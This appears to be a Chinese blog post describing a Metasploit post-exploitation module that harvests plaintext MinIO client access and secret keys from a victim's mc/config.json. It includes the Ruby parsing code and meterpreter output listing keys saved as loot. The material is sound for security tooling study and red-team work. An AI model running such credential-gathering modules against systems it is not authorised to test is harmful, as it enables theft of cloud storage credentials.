Kali-Team

前言

在整理自己的Home目录时发现有一个mc目录，不知道干什么的，点进去发现是之前的minio客户端连接的配置文件，还是明文的，所以简单编写了一个提取的插件，本来想使用
在整理自己的Home目录时发现有一个mc目录，不知道干什么的，点进去发现是之前的minio客户端连接的配置文件，还是明文的，所以简单编写了一个提取的插件，本来想使用Packrat写的，但是输出好像不太友好，所以还是按照以前的方法写。

环境搭建

安装minio客户端，下载一个命令行就可以了。

➜  ~ mc alias set myminio <https://play.min.io> minioadmin minioadmin
➜  ~ mc admin info myminio
●  play.min.io
   Uptime: 4 hours 
   Version: 2022-12-02T19:19:22Z
   Network: 1/1 OK 
   Drives: 4/4 OK 
   Pool: 1st

1.3 GiB Used, 95 Buckets, 1,711 Objects
4 drives online, 0 drives offline

初始化完成会在Home目录下创建mc目录，文件夹里有一个config.json文件，读入解析就可以了。

{
	"version": "10",
	"aliases": {
		"gcs": {
			"url": "<https://storage.googleapis.com>",
			"accessKey": "YOUR-ACCESS-KEY-HERE",
			"secretKey": "YOUR-SECRET-KEY-HERE",
			"api": "S3v2",
			"path": "dns"
		},
		"local": {
			"url": "<http://localhost:9000>",
			"accessKey": "",
			"secretKey": "",
			"api": "S3v4",
			"path": "auto"
		},
		"myminio": {
			"url": "<https://play.min.io>",
			"accessKey": "minioadmin",
			"secretKey": "minioadmin",
			"api": "s3v4",
			"path": "auto"
		},
		"play": {
			"url": "<https://play.min.io>",
			"accessKey": "Q3AM3UQ867SPQQA43P2F",
			"secretKey": "zuf+tfteSlswRu7BJ86wekitnifILbZam1KYY3TG",
			"api": "S3v4",
			"path": "auto"
		},
		"s3": {
			"url": "<https://s3.amazonaws.com>",
			"accessKey": "YOUR-ACCESS-KEY-HERE",
			"secretKey": "YOUR-SECRET-KEY-HERE",
			"api": "S3v4",
			"path": "dns"
		}
	}
}

插件编写

拼接目录判断文件是否存在内容是否为空，是否可以json序列化，直接打印。

def parser_minio(config_path)
  print_status("Parsing file #{config_path}")
  some_result = Hash.new
  if session.fs.file.exist?(config_path)
    file_contents = read_file(config_path)
    if file_contents.nil? || file_contents.empty?
      print_warning('Configuration file content is empty')
      return some_result
    else
      begin
        configuration = JSON.parse(file_contents)
        if !configuration['aliases'].nil?
          some_result = configuration['aliases']
        end
      rescue JSON::ParserError => e
        elog('Unable to parse configuration', error: e)
      end
    end
  end
  return some_result
end

效果

meterpreter > run post/windows/gather/credentials/minio_client CONFIG_PATH="C:\\Users\\FireEye\\mc\\config.json"

[*] Parsing file C:\\Users\\FireEye\\mc\\config.json
MinIO Client Key
================

name     url                             accessKey             secretKey                                 api   path
----     ---                             ---------             ---------                                 ---   ----
gcs      <https://storage.googleapis.com>  YOUR-ACCESS-KEY-HERE  YOUR-SECRET-KEY-HERE                      S3v2  dns
local    <http://localhost:9000>                                                                           S3v4  auto
myminio  <https://play.min.io>             minioadmin            minioadmin                                s3v4  auto
play     <https://play.min.io>             Q3AM3UQ867SPQQA43P2F  zuf+tfteSlswRu7BJ86wekitnifILbZam1KYY3TG  S3v4  auto
s3       <https://s3.amazonaws.com>        YOUR-ACCESS-KEY-HERE  YOUR-SECRET-KEY-HERE                      S3v4  dns

[+] Session info stored in: /home/kali-team/.msf4/loot/20221206193240_default_172.16.153.128_host.minio_756923.txt

参考

https://github.com/rapid7/metasploit-framework/pull/17337

https://github.com/rapid7/metasploit-framework/pull/17341

https://github.com/rapid7/metasploit-framework/pull/17337